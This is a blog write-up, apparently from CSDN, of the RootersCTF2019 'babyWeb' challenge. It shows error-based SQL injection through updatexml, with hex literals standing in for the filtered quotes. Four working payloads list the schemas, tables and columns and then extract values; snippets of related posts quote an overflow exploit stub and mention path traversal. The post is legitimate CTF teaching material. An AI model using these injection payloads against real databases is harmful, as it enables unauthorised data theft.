[RootersCTF2019]babyWeb

最新推荐文章于 2024-05-28 08:31:56 发布
最新推荐文章于 2024-05-28 08:31:56 发布
阅读量742 收藏 2
点赞数 1
分类专栏: BUUCTF 文章标签: web安全 报错注入 用16进制代替引号的功能
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/126937168
版权 
知识点:报错注入,用16进制(0x)代替引号的功能

分析

页面中告诉我们要找一串数字输进去,且过滤了一些关键词。
在这里插入图片描述
UNION被过滤了说明堆叠注入没法用了,并且他还把sql语句给我们了,那大概率是报错注入了,试下看看。

SELECT * FROM users WHERE uniqueid=1

果然是报错注入,这边的||功能和and一样,用and也一样。
在这里插入图片描述
在这里插入图片描述

接下来就慢慢构造呗,这边有一个小的知识点,题目虽然过滤了引号,但我们可以用16进制来达到同样的目的。
例如:table_name='users' 和 table_name=0x7573657273 功能一样

爆库:sql_injection
1||(updatexml(1,concat(0x3a,(select SCHEMA_NAME from information_schema.schemata limit 3,1)),1))#

爆表:users
1||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

列字段:USER CURRENT_CONNECTIONS TOTAL_CONNECTIONS user uniqueid
1||(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name=0x7573657273 limit 4,1)),1))#

取值:
1||(updatexml(1,concat(0x3a,(select uniqueid from sql_injection.users limit 0,1)),1))#

flag

最后在sql_injection.usersuniqueid字段里找到一串数字
在这里插入图片描述
输入到主页的框里就可以拿到flag了。
在这里插入图片描述

succ3
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu-[RootersCTF2019]babyWeb
qaq517384的博客
10-26 386
打开环境,要输对18位数字才能下一步 给了被过滤的字符 UNION|SLEEP|’|"|OR|-|BENCHMARK 在输入一个id后,会返回sql语句 惯例先试万能密码,or过滤了还有and、&&、|| 1||1=1 limit 0,1 有了,不加limit没结果, 做完题瞅一眼源码 <?php $link = mysqli_connect("database", "root", "password", "sql_injection"); if (!$link) { ec
BUUCTF:[RootersCTF2019]babyWeb -----简单的sql注入, 以及sql注入的思路,sql注入思路
Zero_Adam的博客
04-21 490
一、自己做: #不好使, 就是不报错啊,,, 二、学到的: 清楚地理解 万能密码,select * from user where name = 1 。 只会返回一行数据, 但是,select * from user where name = 1 || 1。就会把所有的数据都返回,然后这时候如果想要一行一行看的化,就需要limit ,0,1这样来看, 再试 sql注入思路的化, 首选一定是 联合查询注入,使用order by , group by ,union select这些,与之相关联和有双注
Baby Web Server v2.7.2.zip
07-17
Baby Web Server 是一个非常小巧玲珑的网络服务器,支持Html,还支持ASP部分功能(Request,Response,Server,QueryString and Form collections, Global.asa, Session and Application objects及其他)、更支持Cookie、SSI、IP限制等功能Baby Web Server 可以替代微软的IIS,用于个人主页测试,ASP源代码测试等,经姥姥汉化压缩,大小仅90.5KB,堪称史上最小的网络服务器!使用方法非常简单,只要设定网页路径及网站首页,然后在浏览器地址栏输入本地连接IP即可
BUUCTF--[RootersCTF2019]babyWeb
qq_46263951的博客
07-29 269
进入页面发现有个搜索框,尝试SQL注入测试,闭合时并没有反映,测试一下过滤的内容 SQL查询,过滤了:union、sleep、'、"、or、-、benchmark 利用order by探测有2个字段 尝试利用万能密钥登录: 1 || 1=1 limit 0,1limit在这里的作用是显示第一行内容 ...
[RootersCTF2019]babyWeb 1 BUUCTF
wuyaowangchuan的博客
12-01 720
进入环境 随便输入一个东西 想到的是SQL注入 没有回显,应该是被过滤掉了 直接用这个试试 ?search=1 order by 1 发现可以正常回显 注意到了这个 ?search=1 order by 3 说明有2列 一个为uniqueid另一个应该就是flag 我想继续union查询的时候发现有东西被过滤掉了 输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 SELECT * FROM users WHERE uniqueid=1 || 1=1 limit 0
BUUCTF:[RootersCTF2019]babyWeb
末初的CSDN博客
08-02 1509
题目地址:https://buuoj.cn/challenges#[RootersCTF2019]babyWeb SQL查询,过滤了:union、sleep、'、"、or、-、benchmark order by测试字段数,发现当order by 2时返回正常order by 3返回没有这个字段,确定为两个字段,一个为uniqueid另一个应该就是flag 那么应该就是输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 返回flag ...
buu刷题(第一周)
qq_62046696的博客
03-01 745
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
【愚公系列】2023年06月 攻防世界-Webbabyweb
时光隧道
06-17 4768
SSRF(Server-Side Request Forgery,服务端请求伪造)是一种安全漏洞,攻击者可以通过该漏洞向受害服务器发出伪造的请求,从而访问并获取服务器上的资源。常见的SSRF攻击场景包括访问内部网络的服务、执行本地文件系统命令、攻击外部系统等。SSRF注入漏洞是一种特殊的SSRF漏洞,攻击者通过在目标网站的URL参数中注入恶意代码,使服务器向攻击者指定的网址发起请求,从而实现攻击者的目的。例如,攻击者可以利用SSRF注入漏洞访问内部系统、窃取敏感信息、发起攻击等。
babyweb.exe(免费)
11-29
将个人电脑作为虚拟服务器,可以查看动态网页等……免费的,Win7也能用
juniper基本配置
01-06
juniper基本配置
babyweb
01-05
小型免安装web服务器
babyweb轻巧http服务
02-18
很小很好用的http服务器,用来测试网页一流。
babyweb.exe
12-08
小巧的ASP服务器环境安装软件 Windows Vista Home Basic 不支持iis功能.这个小软件可代替它.
baby_web (攻防世界)
HackerYY的博客
11-23 2832
攻防世界baby_web 内附解题过程
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 366
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
[GFCTF 2021]Baby_Web(复现)
qq_53460654的博客
12-20 4605
打开环境 所以要我们读取上层目录的某个文件 所以我想应该会存在任意文件读取和路径穿越漏洞 然后标签有CVE-2021-41773 所以直接github拿到这个漏洞的 工具 payload 我们来读一下index.php.txt <?php error_reporting(0); define("main","main"); include "Class.php"; $temp = new Temp($_POST); $temp->display($_GET['filename']); ?
攻防世界-baby_web详解
Mr_helloword的博客
08-10 8818
baby_web 题目描述:想想初始页面是哪个 根据提示我们尝试/index.php页面: 发现网页直接跳转到1.php我们尝试抓包分析 抓包:(index.php) 点 Foward放过当跳转到1.php时放到repeater模块 发现flag但是隐藏了 falg: flag{very_baby_web} ...
黑龙江等保测评:强化网络安全的北方防线
最新发布
2301_79527080的博客
05-28 309
二、黑龙江等保测评的实践探索1. 法规政策引领:黑龙江省积极响应国家网络安全法律法规要求,出台了一系列地方性政策文件,明确了等保测评的实施标准和要求,为全省范围内的等保工作提供了法律依据和指导。2. 强化合规意识:等保测评的实施增强了组织和个人的网络安全合规意识,推动了网络安全法律法规的落实,形成了良好的网络安全文化氛围。3. 促进产业发展:等保测评需求带动了网络安全服务市场的繁荣,促进了本土网络安全企业的成长,同时也吸引了国内外先进技术和服务的引进,为黑龙江乃至东北地区的数字经济转型提供了安全保障。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值